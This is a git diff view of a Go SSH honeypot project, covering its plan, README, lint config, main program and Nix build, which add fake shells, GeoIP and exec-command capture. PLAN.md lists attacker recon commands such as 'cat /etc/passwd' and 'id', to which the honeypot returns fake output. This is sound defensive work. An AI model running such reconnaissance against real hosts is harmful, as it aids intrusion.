Compare commits
53 Commits
ae9924ffbb
...
master
| Author | SHA1 | Date | |
|---|---|---|---|
|
1b28f10ca8
|
|||
|
664e79fce6
|
|||
|
c74313c195
|
|||
|
9783ae5865
|
|||
|
62de222488
|
|||
| c9d143d84b | |||
|
d18a904ed5
|
|||
|
cb7be28f42
|
|||
|
0908b43724
|
|||
|
52310f588d
|
|||
|
b52216bd2f
|
|||
|
2bc83a17dd
|
|||
|
faf6e2abd7
|
|||
|
0a4eac188a
|
|||
|
7c90c9ed4a
|
|||
|
8a631af0d2
|
|||
|
40fda3420c
|
|||
|
c4801e3309
|
|||
|
4f10a8a422
|
|||
|
0b44d1c83f
|
|||
|
0133d956a5
|
|||
|
3c20e854aa
|
|||
|
090dbec390
|
|||
|
df860b3061
|
|||
|
9aecc7ce02
|
|||
|
94f1f1c266
|
|||
|
8fff893d25
|
|||
|
5ba62afec3
|
|||
|
058da51f86
|
|||
|
adfe372d13
|
|||
|
3163ea47dc
|
|||
|
ab07e6a8dc
|
|||
|
b8fcbc7e10
|
|||
|
aa569aac16
|
|||
|
1a407ad4c2
|
|||
|
5d0c8cc20c
|
|||
|
d226c32b9b
|
|||
|
86786c9d05
|
|||
| d78d461236 | |||
| 49425635ce | |||
| 8ff029fcb7 | |||
| 462c44ce89 | |||
| 47159b9964 | |||
| 8e90f21d91 | |||
| 84c6912435 | |||
| 541b0df007 | |||
| 24c166b86b | |||
| d4380c0aea | |||
| 0ad6f4cb6a | |||
| 96c8476f77 | |||
| 85e79c97ac | |||
| 535e9eef4f | |||
| 8189a108d1 |
55
.claude/skills/bubbletea/SKILL.md
Normal file
55
.claude/skills/bubbletea/SKILL.md
Normal file
@@ -0,0 +1,55 @@
|
|||||||
|
---
|
||||||
|
name: bubbletea
|
||||||
|
description: Browse Bubbletea TUI framework documentation and examples. Use when working with Bubbletea components, models, commands, or building terminal user interfaces in Go.
|
||||||
|
---
|
||||||
|
|
||||||
|
# Bubbletea Documentation
|
||||||
|
|
||||||
|
Bubbletea is a Go framework for building terminal user interfaces based on The Elm Architecture.
|
||||||
|
|
||||||
|
## Key Resources
|
||||||
|
|
||||||
|
When you need to understand Bubbletea patterns or find examples:
|
||||||
|
|
||||||
|
1. **Examples README** - Overview of all available examples:
|
||||||
|
https://github.com/charmbracelet/bubbletea/blob/main/examples/README.md
|
||||||
|
|
||||||
|
2. **Examples Directory** - Full source code for all examples:
|
||||||
|
https://github.com/charmbracelet/bubbletea/tree/main/examples
|
||||||
|
|
||||||
|
## How to Use
|
||||||
|
|
||||||
|
1. First, fetch the examples README to get an overview of available examples:
|
||||||
|
```
|
||||||
|
WebFetch https://github.com/charmbracelet/bubbletea/blob/main/examples/README.md
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Once you identify a relevant example, fetch its source code from the examples directory.
|
||||||
|
|
||||||
|
## Common Examples to Reference
|
||||||
|
|
||||||
|
- `list` - List component with filtering
|
||||||
|
- `table` - Table component
|
||||||
|
- `textinput` - Text input handling
|
||||||
|
- `textarea` - Multi-line text input
|
||||||
|
- `viewport` - Scrollable content
|
||||||
|
- `paginator` - Pagination
|
||||||
|
- `spinner` - Loading spinners
|
||||||
|
- `progress` - Progress bars
|
||||||
|
- `tabs` - Tab navigation
|
||||||
|
- `help` - Help text/keybindings display
|
||||||
|
|
||||||
|
## Core Concepts
|
||||||
|
|
||||||
|
- **Model**: Application state
|
||||||
|
- **Update**: Handles messages and returns updated model + commands
|
||||||
|
- **View**: Renders the model to a string
|
||||||
|
- **Cmd**: Side effects that produce messages
|
||||||
|
- **Msg**: Events that trigger updates
|
||||||
|
|
||||||
|
## Related Charm Libraries
|
||||||
|
|
||||||
|
- **Bubbles**: Pre-built components (github.com/charmbracelet/bubbles)
|
||||||
|
- **Lipgloss**: Styling and layout (github.com/charmbracelet/lipgloss)
|
||||||
|
- **Glamour**: Markdown rendering (github.com/charmbracelet/glamour)
|
||||||
|
|
||||||
2
.gitignore
vendored
2
.gitignore
vendored
@@ -4,3 +4,5 @@ oubliette.toml
|
|||||||
*.db-wal
|
*.db-wal
|
||||||
*.db-shm
|
*.db-shm
|
||||||
/oubliette
|
/oubliette
|
||||||
|
*.mmdb
|
||||||
|
*.mmdb.gz
|
||||||
|
|||||||
79
.golangci.yml
Normal file
79
.golangci.yml
Normal file
@@ -0,0 +1,79 @@
|
|||||||
|
version: "2"
|
||||||
|
|
||||||
|
linters:
|
||||||
|
enable:
|
||||||
|
# Bug detectors.
|
||||||
|
- bodyclose
|
||||||
|
- durationcheck
|
||||||
|
- errorlint
|
||||||
|
- gocritic
|
||||||
|
- nilerr
|
||||||
|
- sqlclosecheck
|
||||||
|
|
||||||
|
# Security.
|
||||||
|
- gosec
|
||||||
|
|
||||||
|
# Style and modernization.
|
||||||
|
- misspell
|
||||||
|
- modernize
|
||||||
|
- unconvert
|
||||||
|
- usestdlibvars
|
||||||
|
|
||||||
|
# Logging.
|
||||||
|
- sloglint
|
||||||
|
|
||||||
|
# Dead code.
|
||||||
|
- wastedassign
|
||||||
|
|
||||||
|
settings:
|
||||||
|
errcheck:
|
||||||
|
exclude-functions:
|
||||||
|
# Terminal I/O writes (honeypot shell output).
|
||||||
|
- fmt.Fprint
|
||||||
|
- fmt.Fprintf
|
||||||
|
# Low-level byte I/O in shell readLine (escape sequences, echo).
|
||||||
|
- (io.ReadWriter).Read
|
||||||
|
- (io.ReadWriter).Write
|
||||||
|
- (io.ReadWriteCloser).Read
|
||||||
|
- (io.ReadWriteCloser).Write
|
||||||
|
- (io.Reader).Read
|
||||||
|
- (io.Writer).Write
|
||||||
|
|
||||||
|
gosec:
|
||||||
|
excludes:
|
||||||
|
# File reads from config paths — expected in a CLI tool.
|
||||||
|
- G304
|
||||||
|
# Weak RNG for shell selection — crypto/rand not needed.
|
||||||
|
- G404
|
||||||
|
|
||||||
|
exclusions:
|
||||||
|
rules:
|
||||||
|
# Ignore unchecked Close() — standard resource cleanup.
|
||||||
|
- linters: [errcheck]
|
||||||
|
text: "Error return value of .+\\.Close.+ is not checked"
|
||||||
|
|
||||||
|
# Ignore unchecked Rollback() — called in error paths before returning.
|
||||||
|
- linters: [errcheck]
|
||||||
|
text: "Error return value of .+\\.Rollback.+ is not checked"
|
||||||
|
|
||||||
|
# Ignore unchecked Reply/Reject — SSH protocol; nothing useful on failure.
|
||||||
|
- linters: [errcheck]
|
||||||
|
text: "Error return value of .+\\.(Reply|Reject).+ is not checked"
|
||||||
|
|
||||||
|
# Test files: allow unchecked errors.
|
||||||
|
- linters: [errcheck]
|
||||||
|
path: "_test\\.go"
|
||||||
|
|
||||||
|
# Test files: InsecureIgnoreHostKey, file permissions, unhandled errors are expected.
|
||||||
|
- linters: [gosec]
|
||||||
|
path: "_test\\.go"
|
||||||
|
|
||||||
|
# Unhandled errors for cleanup/protocol ops — mirrors errcheck exclusions.
|
||||||
|
- linters: [gosec]
|
||||||
|
text: "G104"
|
||||||
|
source: "\\.(Close|Rollback|Reject|Reply|Read|Write)\\("
|
||||||
|
|
||||||
|
# SQL with safe column interpolation from a fixed switch — not user input.
|
||||||
|
- linters: [gosec]
|
||||||
|
text: "G201"
|
||||||
|
path: "internal/storage/"
|
||||||
101
PLAN.md
101
PLAN.md
@@ -74,7 +74,7 @@ Goal: A working SSH honeypot that logs attempts, stores them in SQLite, and can
|
|||||||
- Retention policy: background goroutine that prunes old records on a schedule
|
- Retention policy: background goroutine that prunes old records on a schedule
|
||||||
- **Database migrations:** Version-tracked migrations using embedded SQL files. Store current schema version in a `schema_version` table, apply pending migrations on startup. Keep it simple - no external migration tool, just sequential numbered `.sql` files embedded in the binary.
|
- **Database migrations:** Version-tracked migrations using embedded SQL files. Store current schema version in a `schema_version` table, apply pending migrations on startup. Keep it simple - no external migration tool, just sequential numbered `.sql` files embedded in the binary.
|
||||||
|
|
||||||
### 1.4 Shell Interface & Registry
|
### 1.4 Shell Interface & Registry ✅
|
||||||
- Shell interface definition
|
- Shell interface definition
|
||||||
- Registry with weighted random selection
|
- Registry with weighted random selection
|
||||||
- Basic bash-like shell:
|
- Basic bash-like shell:
|
||||||
@@ -105,7 +105,7 @@ This lets shells build realistic prompts (`username@hostname:~$`) and log activi
|
|||||||
- This ensures consistent, complete capture regardless of shell implementation, and avoids needing to refactor shells when session replay is added in Phase 2.3
|
- This ensures consistent, complete capture regardless of shell implementation, and avoids needing to refactor shells when session replay is added in Phase 2.3
|
||||||
- The current `session_logs` schema (input/output text pairs) may need a companion `session_keystrokes` table with `(session_id, timestamp, direction, data)` for byte-level replay fidelity — evaluate when implementing
|
- The current `session_logs` schema (input/output text pairs) may need a companion `session_keystrokes` table with `(session_id, timestamp, direction, data)` for byte-level replay fidelity — evaluate when implementing
|
||||||
|
|
||||||
### 1.5 Minimal Web UI
|
### 1.5 Minimal Web UI ✅
|
||||||
- Embedded static assets (Go embed)
|
- Embedded static assets (Go embed)
|
||||||
- Dashboard: total attempts, attempts over time, unique IPs
|
- Dashboard: total attempts, attempts over time, unique IPs
|
||||||
- Tables: top usernames, top passwords, top source IPs
|
- Tables: top usernames, top passwords, top source IPs
|
||||||
@@ -117,19 +117,19 @@ This lets shells build realistic prompts (`username@hostname:~$`) and log activi
|
|||||||
|
|
||||||
Goal: Detect likely-human sessions and make the system smarter.
|
Goal: Detect likely-human sessions and make the system smarter.
|
||||||
|
|
||||||
### 2.1 Human Detection Scoring
|
### 2.1 Human Detection Scoring ✅
|
||||||
- Keystroke timing analysis
|
- Keystroke timing analysis
|
||||||
- Track backspace, tab, arrow key usage
|
- Track backspace, tab, arrow key usage
|
||||||
- Command diversity scoring
|
- Command diversity scoring
|
||||||
- Compute per-session human score, store in sessions table
|
- Compute per-session human score, store in sessions table
|
||||||
- Flag sessions above configurable threshold
|
- Flag sessions above configurable threshold
|
||||||
|
|
||||||
### 2.2 Notifications
|
### 2.2 Notifications ✅
|
||||||
- Webhook support (generic HTTP POST, works with Slack/Discord/ntfy)
|
- Webhook support (generic HTTP POST, works with Slack/Discord/ntfy)
|
||||||
- Trigger on: human score threshold crossed, new session started, configurable
|
- Trigger on: human score threshold crossed, new session started, configurable
|
||||||
- Include session details in payload
|
- Include session details in payload
|
||||||
|
|
||||||
### 2.3 Session Replay
|
### 2.3 Session Replay ✅
|
||||||
- Store keystroke-by-keystroke data with timing information
|
- Store keystroke-by-keystroke data with timing information
|
||||||
- Web UI: replay a session in a terminal-like viewer, watching commands play back in real-time
|
- Web UI: replay a session in a terminal-like viewer, watching commands play back in real-time
|
||||||
- Filter/sort sessions by human score
|
- Filter/sort sessions by human score
|
||||||
@@ -150,26 +150,41 @@ Goal: Add the entertaining shell implementations.
|
|||||||
- **Haunted:** commands gradually return stranger output, files appear/disappear, `whoami` returns different users
|
- **Haunted:** commands gradually return stranger output, files appear/disappear, `whoami` returns different users
|
||||||
- **Bread crumbs:** fake .bash_history, id_rsa files, database configs pointing to other honeypots
|
- **Bread crumbs:** fake .bash_history, id_rsa files, database configs pointing to other honeypots
|
||||||
|
|
||||||
### 3.2 Cisco IOS Shell
|
### 3.2 Cisco IOS Shell ✅
|
||||||
- Realistic `>` and `#` prompts
|
- Realistic `>` and `#` prompts
|
||||||
- Common commands: `show running-config`, `show interfaces`, `enable`, `configure terminal`
|
- Common commands: `show running-config`, `show interfaces`, `enable`, `configure terminal`
|
||||||
- Fake device info that looks like a real router
|
- Fake device info that looks like a real router
|
||||||
|
|
||||||
### 3.3 Smart Fridge Shell
|
### 3.3 Smart Fridge Shell ✅
|
||||||
- Samsung FridgeOS boot banner
|
- Samsung FridgeOS boot banner
|
||||||
- Inventory management commands
|
- Inventory management commands
|
||||||
- Temperature warnings
|
- Temperature warnings
|
||||||
- "WARNING: milk expires in 2 days"
|
- "WARNING: milk expires in 2 days"
|
||||||
- Easter eggs
|
- Per-credential shell routing via `shell` field in static credentials
|
||||||
|
|
||||||
### 3.4 Text Adventure
|
### 3.4 Text Adventure ✅
|
||||||
- Zork-style dungeon crawler
|
- Zork-style dungeon crawler
|
||||||
- "You are in a dimly lit server room."
|
- "You are in a dimly lit server room."
|
||||||
- Navigation, items, puzzles
|
- Navigation, items, puzzles
|
||||||
- The dungeon is the oubliette itself
|
- The dungeon is the oubliette itself
|
||||||
|
|
||||||
### 3.5 Other Shell Ideas (Future)
|
### 3.5 Banking TUI Shell ✅
|
||||||
- **Banking TUI:** 80s-style green-on-black bank terminal
|
- 80s-style green-on-black bank terminal
|
||||||
|
|
||||||
|
### 3.6 PostgreSQL psql Shell ✅
|
||||||
|
- Simulates psql interactive terminal with `db_name` and `pg_version` config
|
||||||
|
- Backslash meta-commands: `\q`, `\dt`, `\d <table>`, `\l`, `\du`, `\conninfo`, `\?`, `\h`
|
||||||
|
- SQL statement handling with multi-line buffering (semicolon-terminated)
|
||||||
|
- Canned responses for common queries (SELECT version(), current_database(), etc.)
|
||||||
|
- DDL/DML acknowledgments (CREATE TABLE, INSERT, UPDATE, DELETE, etc.)
|
||||||
|
- Username-to-shell routing: configurable `[shell.username_routes]` maps usernames to shells
|
||||||
|
|
||||||
|
### 3.7 Roomba Shell ✅
|
||||||
|
- iRobot Roomba j7+ vacuum robot interface
|
||||||
|
- Status, cleaning, scheduling, diagnostics, floor map
|
||||||
|
- Humorous history entries (cat encounters, sock tangles, sticky substances)
|
||||||
|
|
||||||
|
### 3.8 Other Shell Ideas (Future)
|
||||||
- **Nuclear launch terminal:** "ENTER LAUNCH AUTHORIZATION CODE"
|
- **Nuclear launch terminal:** "ENTER LAUNCH AUTHORIZATION CODE"
|
||||||
- **ELIZA therapist:** every response is a therapy question
|
- **ELIZA therapist:** every response is a therapy question
|
||||||
- **Pizza ordering terminal:** "Welcome to PizzaNet v2.3"
|
- **Pizza ordering terminal:** "Welcome to PizzaNet v2.3"
|
||||||
@@ -181,19 +196,55 @@ Goal: Add the entertaining shell implementations.
|
|||||||
|
|
||||||
Goal: Make the web UI great and add operational niceties.
|
Goal: Make the web UI great and add operational niceties.
|
||||||
|
|
||||||
### 4.1 Enhanced Web UI
|
### 4.1 Enhanced Web UI ✅
|
||||||
- GeoIP lookups and world map visualization of attack sources
|
- GeoIP lookups and world map visualization of attack sources ✅
|
||||||
- Charts: attempts over time, hourly patterns, credential trends
|
- Charts: attempts over time, hourly patterns, credential trends ✅
|
||||||
- Session detail view with full command log
|
- Session detail view with full command log ✅
|
||||||
- Filtering and search
|
- Filtering and search ✅
|
||||||
|
|
||||||
### 4.2 Operational
|
### 4.2 Operational ✅
|
||||||
- Prometheus metrics endpoint
|
- Prometheus metrics endpoint ✅
|
||||||
- Structured logging (slog)
|
- Structured logging (slog) ✅
|
||||||
- Graceful shutdown
|
- Graceful shutdown ✅
|
||||||
- Systemd unit file / deployment docs
|
- Docker image (nix dockerTools) ✅
|
||||||
|
- Systemd unit file / deployment docs ✅
|
||||||
|
|
||||||
### 4.3 GeoIP
|
### 4.3 GeoIP ✅
|
||||||
- Embed a lightweight GeoIP database or use an API
|
- Embed a lightweight GeoIP database or use an API ✅
|
||||||
- Store country/city with each attempt
|
- Store country/city with each attempt ✅
|
||||||
- Aggregate stats by country
|
- Aggregate stats by country ✅
|
||||||
|
|
||||||
|
### 4.4 Capture SSH Exec Commands ✅
|
||||||
|
Many bots send a command directly via `ssh user@host <command>` (an SSH "exec" request) rather than requesting an interactive shell. Currently these are rejected and the command is lost. We should capture them.
|
||||||
|
|
||||||
|
- Handle `"exec"` request type in the server's request loop (alongside `"pty-req"` and `"shell"`) ✅
|
||||||
|
- Parse the command string from the exec payload ✅
|
||||||
|
- Add an `exec_command` column (nullable) to the `sessions` table via a new migration ✅
|
||||||
|
- Store the command on the session record before closing the channel ✅
|
||||||
|
- Optionally return plausible fake output for common commands (e.g. `uname`, `id`, `cat /etc/passwd`) to encourage further interaction
|
||||||
|
- Surface exec commands in the web UI (session detail view) ✅
|
||||||
|
|
||||||
|
#### 4.4.1 Fake Exec Output
|
||||||
|
Return plausible fake output for exec commands to encourage bots to interact further.
|
||||||
|
|
||||||
|
**Approach: regex-based output assembly.** Bots typically send a single long command that chains recon commands and then echoes a summary (e.g. `echo "UNAME:$uname"`). Rather than interpreting arbitrary shell pipelines, we scan the command string for known patterns and assemble fake output.
|
||||||
|
|
||||||
|
Implementation:
|
||||||
|
- A map of common command/variable patterns to fake output strings, e.g.:
|
||||||
|
- `uname -a` / `uname -s -v -n -m` → `"Linux ubuntu-server 5.15.0-91-generic #101-Ubuntu SMP Tue Jan 2 15:13:10 UTC 2024 x86_64"`
|
||||||
|
- `uname -m` / `arch` → `"x86_64"`
|
||||||
|
- `cat /proc/uptime` → `"86432.71 172801.55"`
|
||||||
|
- `nproc` / `grep -c "^processor" /proc/cpuinfo` → `"2"`
|
||||||
|
- `cat /proc/cpuinfo` → fake cpuinfo block
|
||||||
|
- `lspci` → empty (no GPU — discourages cryptominer targeting)
|
||||||
|
- `id` → `"uid=0(root) gid=0(root) groups=0(root)"`
|
||||||
|
- `cat /etc/passwd` → minimal fake passwd file
|
||||||
|
- `last` → fake login entries
|
||||||
|
- `cat --help`, `ls --help` → canned GNU coreutils help text
|
||||||
|
- Scan the exec command for `echo "KEY:$var"` patterns; for each key, look up the corresponding fake value from the variable assignment earlier in the command
|
||||||
|
- If we recognise echo patterns, assemble and return the expected output
|
||||||
|
- If we don't recognise the command at all, return empty output with exit 0 (current behaviour)
|
||||||
|
- Values should draw from the existing shell config where possible (hostname, fake_user) for consistency
|
||||||
|
- New package `internal/execfake` or a file in `internal/server/` — keep it simple
|
||||||
|
|
||||||
|
Gather more real-world bot examples before implementing to ensure good coverage of common recon patterns.
|
||||||
|
|||||||
38
README.md
38
README.md
@@ -33,10 +33,31 @@ Key settings:
|
|||||||
- `ssh.host_key_path` — Ed25519 host key, auto-generated if missing
|
- `ssh.host_key_path` — Ed25519 host key, auto-generated if missing
|
||||||
- `auth.accept_after` — accept login after N failures per IP (default `10`)
|
- `auth.accept_after` — accept login after N failures per IP (default `10`)
|
||||||
- `auth.credential_ttl` — how long to remember accepted credentials (default `24h`)
|
- `auth.credential_ttl` — how long to remember accepted credentials (default `24h`)
|
||||||
- `auth.static_credentials` — always-accepted username/password pairs
|
- `auth.static_credentials` — always-accepted username/password pairs (optional `shell` field routes to a specific shell)
|
||||||
|
- Available shells: `bash` (fake Linux shell), `fridge` (Samsung Smart Fridge OS), `banking` (80s-style bank terminal TUI), `adventure` (Zork-style text adventure dungeon), `cisco` (Cisco IOS CLI with mode state machine and command abbreviation), `psql` (PostgreSQL psql interactive terminal), `roomba` (iRobot Roomba vacuum robot), `tetris` (Tetris game TUI)
|
||||||
|
- `shell.username_routes` — map usernames to specific shells (e.g. `postgres = "psql"`); credential-specific shell overrides take priority
|
||||||
- `storage.db_path` — SQLite database path (default `oubliette.db`)
|
- `storage.db_path` — SQLite database path (default `oubliette.db`)
|
||||||
- `storage.retention_days` — auto-prune records older than N days (default `90`)
|
- `storage.retention_days` — auto-prune records older than N days (default `90`)
|
||||||
- `storage.retention_interval` — how often to run retention (default `1h`)
|
- `storage.retention_interval` — how often to run retention (default `1h`)
|
||||||
|
- `shell.hostname` — hostname shown in shell prompts (default `ubuntu-server`)
|
||||||
|
- `shell.banner` — banner displayed on connection
|
||||||
|
- `shell.fake_user` — override username in prompt; empty uses the authenticated user
|
||||||
|
- `web.enabled` — enable the web dashboard (default `false`)
|
||||||
|
- `web.listen_addr` — web dashboard listen address (default `:8080`)
|
||||||
|
- Dashboard includes Chart.js charts (attempts over time, hourly pattern), an SVG world map choropleth colored by attack origin, and filter controls for date range / IP / country / username
|
||||||
|
- Session detail pages at `/sessions/{id}` include terminal replay via xterm.js
|
||||||
|
- `web.metrics_enabled` — expose Prometheus metrics at `/metrics` (default `true`)
|
||||||
|
- `web.metrics_token` — bearer token to protect `/metrics`; empty means no auth (default empty)
|
||||||
|
- `detection.enabled` — enable human detection scoring (default `false`)
|
||||||
|
- `detection.threshold` — score threshold (0.0–1.0) for flagging sessions (default `0.6`)
|
||||||
|
- `detection.update_interval` — how often to recompute scores (default `5s`)
|
||||||
|
- `notify.webhooks` — list of webhook endpoints for notifications (see example config)
|
||||||
|
|
||||||
|
### GeoIP
|
||||||
|
|
||||||
|
Country-level GeoIP lookups are embedded in the binary using the [DB-IP Lite](https://db-ip.com/db/lite.php) database (CC-BY-4.0). The dashboard shows country alongside IPs and includes a "Top Countries" table.
|
||||||
|
|
||||||
|
For local development, run `scripts/fetch-geoip.sh` to download the MMDB file. The Nix build fetches it automatically.
|
||||||
|
|
||||||
### Run
|
### Run
|
||||||
|
|
||||||
@@ -50,6 +71,9 @@ Test with:
|
|||||||
ssh -o StrictHostKeyChecking=no -p 2222 root@localhost
|
ssh -o StrictHostKeyChecking=no -p 2222 root@localhost
|
||||||
```
|
```
|
||||||
|
|
||||||
|
SSH exec commands (`ssh user@host <command>`) are also captured and stored on the session record.
|
||||||
|
|
||||||
|
|
||||||
### NixOS Module
|
### NixOS Module
|
||||||
|
|
||||||
Add the flake as an input and enable the service:
|
Add the flake as an input and enable the service:
|
||||||
@@ -71,3 +95,15 @@ Add the flake as an input and enable the service:
|
|||||||
```
|
```
|
||||||
|
|
||||||
Alternatively, use `configFile` to pass a pre-written TOML file instead of `settings`.
|
Alternatively, use `configFile` to pass a pre-written TOML file instead of `settings`.
|
||||||
|
|
||||||
|
### Docker
|
||||||
|
|
||||||
|
Build a Docker image via nix:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
nix build .#dockerImage
|
||||||
|
docker load < result
|
||||||
|
docker run -v /path/to/data:/data -p 2222:2222 -p 8080:8080 oubliette:0.8.0
|
||||||
|
```
|
||||||
|
|
||||||
|
Place your `oubliette.toml` in the data volume. The container exposes ports 2222 (SSH) and 8080 (web/metrics).
|
||||||
|
|||||||
@@ -2,27 +2,40 @@ package main
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"context"
|
"context"
|
||||||
|
"errors"
|
||||||
"flag"
|
"flag"
|
||||||
|
"fmt"
|
||||||
"log/slog"
|
"log/slog"
|
||||||
|
"net/http"
|
||||||
"os"
|
"os"
|
||||||
"os/signal"
|
"os/signal"
|
||||||
|
"sync"
|
||||||
"syscall"
|
"syscall"
|
||||||
|
"time"
|
||||||
|
|
||||||
"git.t-juice.club/torjus/oubliette/internal/config"
|
"code.t-juice.club/torjus/oubliette/internal/config"
|
||||||
"git.t-juice.club/torjus/oubliette/internal/server"
|
"code.t-juice.club/torjus/oubliette/internal/metrics"
|
||||||
"git.t-juice.club/torjus/oubliette/internal/storage"
|
"code.t-juice.club/torjus/oubliette/internal/server"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/web"
|
||||||
)
|
)
|
||||||
|
|
||||||
const Version = "0.1.0"
|
const Version = "0.18.0"
|
||||||
|
|
||||||
func main() {
|
func main() {
|
||||||
|
if err := run(); err != nil {
|
||||||
|
slog.Error("fatal error", "err", err)
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func run() error {
|
||||||
configPath := flag.String("config", "oubliette.toml", "path to config file")
|
configPath := flag.String("config", "oubliette.toml", "path to config file")
|
||||||
flag.Parse()
|
flag.Parse()
|
||||||
|
|
||||||
cfg, err := config.Load(*configPath)
|
cfg, err := config.Load(*configPath)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
slog.Error("failed to load config", "err", err)
|
return fmt.Errorf("load config: %w", err)
|
||||||
os.Exit(1)
|
|
||||||
}
|
}
|
||||||
|
|
||||||
level := new(slog.LevelVar)
|
level := new(slog.LevelVar)
|
||||||
@@ -49,26 +62,72 @@ func main() {
|
|||||||
|
|
||||||
store, err := storage.NewSQLiteStore(cfg.Storage.DBPath)
|
store, err := storage.NewSQLiteStore(cfg.Storage.DBPath)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
logger.Error("failed to open database", "err", err)
|
return fmt.Errorf("open database: %w", err)
|
||||||
os.Exit(1)
|
|
||||||
}
|
}
|
||||||
defer store.Close()
|
defer store.Close()
|
||||||
|
|
||||||
|
// Clean up sessions left active by a previous unclean shutdown.
|
||||||
|
if n, err := store.CloseActiveSessions(context.Background(), time.Now()); err != nil {
|
||||||
|
return fmt.Errorf("close stale sessions: %w", err)
|
||||||
|
} else if n > 0 {
|
||||||
|
logger.Info("closed stale sessions from previous run", "count", n)
|
||||||
|
}
|
||||||
|
|
||||||
ctx, cancel := signal.NotifyContext(context.Background(), syscall.SIGINT, syscall.SIGTERM)
|
ctx, cancel := signal.NotifyContext(context.Background(), syscall.SIGINT, syscall.SIGTERM)
|
||||||
defer cancel()
|
defer cancel()
|
||||||
|
|
||||||
go storage.RunRetention(ctx, store, cfg.Storage.RetentionDays, cfg.Storage.RetentionIntervalDuration, logger)
|
m := metrics.New(Version)
|
||||||
|
instrumentedStore := storage.NewInstrumentedStore(store, m.StorageQueryDuration, m.StorageQueryErrors)
|
||||||
|
m.RegisterStoreCollector(instrumentedStore)
|
||||||
|
|
||||||
srv, err := server.New(*cfg, store, logger)
|
go storage.RunRetention(ctx, instrumentedStore, cfg.Storage.RetentionDays, cfg.Storage.RetentionIntervalDuration, logger)
|
||||||
|
|
||||||
|
srv, err := server.New(*cfg, instrumentedStore, logger, m)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
logger.Error("failed to create server", "err", err)
|
return fmt.Errorf("create server: %w", err)
|
||||||
os.Exit(1)
|
}
|
||||||
|
|
||||||
|
var wg sync.WaitGroup
|
||||||
|
|
||||||
|
// Start web server if enabled.
|
||||||
|
if cfg.Web.Enabled {
|
||||||
|
var metricsHandler http.Handler
|
||||||
|
if *cfg.Web.MetricsEnabled {
|
||||||
|
metricsHandler = m.Handler()
|
||||||
|
}
|
||||||
|
|
||||||
|
webHandler, err := web.NewServer(instrumentedStore, logger.With("component", "web"), metricsHandler, cfg.Web.MetricsToken)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("create web server: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
httpServer := &http.Server{
|
||||||
|
Addr: cfg.Web.ListenAddr,
|
||||||
|
Handler: webHandler,
|
||||||
|
ReadHeaderTimeout: 10 * time.Second,
|
||||||
|
}
|
||||||
|
|
||||||
|
wg.Go(func() {
|
||||||
|
logger.Info("web server listening", "addr", cfg.Web.ListenAddr)
|
||||||
|
if err := httpServer.ListenAndServe(); err != nil && !errors.Is(err, http.ErrServerClosed) {
|
||||||
|
logger.Error("web server error", "err", err)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
// Graceful shutdown on context cancellation.
|
||||||
|
go func() {
|
||||||
|
<-ctx.Done()
|
||||||
|
if err := httpServer.Shutdown(context.Background()); err != nil {
|
||||||
|
logger.Error("web server shutdown error", "err", err)
|
||||||
|
}
|
||||||
|
}()
|
||||||
}
|
}
|
||||||
|
|
||||||
if err := srv.ListenAndServe(ctx); err != nil {
|
if err := srv.ListenAndServe(ctx); err != nil {
|
||||||
logger.Error("server error", "err", err)
|
return fmt.Errorf("server: %w", err)
|
||||||
os.Exit(1)
|
|
||||||
}
|
}
|
||||||
|
|
||||||
|
wg.Wait()
|
||||||
logger.Info("server stopped")
|
logger.Info("server stopped")
|
||||||
|
return nil
|
||||||
}
|
}
|
||||||
|
|||||||
28
flake.nix
28
flake.nix
@@ -18,19 +18,44 @@
|
|||||||
pkgs = nixpkgs.legacyPackages.${system};
|
pkgs = nixpkgs.legacyPackages.${system};
|
||||||
mainGo = builtins.readFile ./cmd/oubliette/main.go;
|
mainGo = builtins.readFile ./cmd/oubliette/main.go;
|
||||||
version = builtins.head (builtins.match ''.*const Version = "([^"]+)".*'' mainGo);
|
version = builtins.head (builtins.match ''.*const Version = "([^"]+)".*'' mainGo);
|
||||||
|
geoipDb = pkgs.fetchurl {
|
||||||
|
url = "https://download.db-ip.com/free/dbip-country-lite-2026-02.mmdb.gz";
|
||||||
|
hash = "sha256-xmQZEJZ5WzE9uQww1Sdb8248l+liYw46tjbfJeu945Q=";
|
||||||
|
};
|
||||||
in
|
in
|
||||||
{
|
{
|
||||||
default = pkgs.buildGoModule {
|
default = pkgs.buildGoModule {
|
||||||
pname = "oubliette";
|
pname = "oubliette";
|
||||||
inherit version;
|
inherit version;
|
||||||
src = ./.;
|
src = ./.;
|
||||||
vendorHash = "sha256-EbJ90e4Jco7CvYYJLrewFLD5XF+Wv6TsT8RRLcj+ijU=";
|
vendorHash = "sha256-/zxK6CABLYBNtuSOI8dIVgMNxKiDIcbZUS7bQR5TenA=";
|
||||||
subPackages = [ "cmd/oubliette" ];
|
subPackages = [ "cmd/oubliette" ];
|
||||||
|
nativeBuildInputs = [ pkgs.gzip ];
|
||||||
|
preBuild = ''
|
||||||
|
gunzip -c ${geoipDb} > internal/geoip/dbip-country-lite.mmdb
|
||||||
|
'';
|
||||||
meta = {
|
meta = {
|
||||||
description = "SSH honeypot";
|
description = "SSH honeypot";
|
||||||
mainProgram = "oubliette";
|
mainProgram = "oubliette";
|
||||||
};
|
};
|
||||||
};
|
};
|
||||||
|
|
||||||
|
dockerImage = pkgs.dockerTools.buildLayeredImage {
|
||||||
|
name = "oubliette";
|
||||||
|
tag = version;
|
||||||
|
contents = [ self.packages.${system}.default ];
|
||||||
|
config = {
|
||||||
|
Entrypoint = [ "/bin/oubliette" ];
|
||||||
|
Cmd = [ "-config" "/data/oubliette.toml" ];
|
||||||
|
ExposedPorts = {
|
||||||
|
"2222/tcp" = {};
|
||||||
|
"8080/tcp" = {};
|
||||||
|
};
|
||||||
|
Volumes = {
|
||||||
|
"/data" = {};
|
||||||
|
};
|
||||||
|
};
|
||||||
|
};
|
||||||
});
|
});
|
||||||
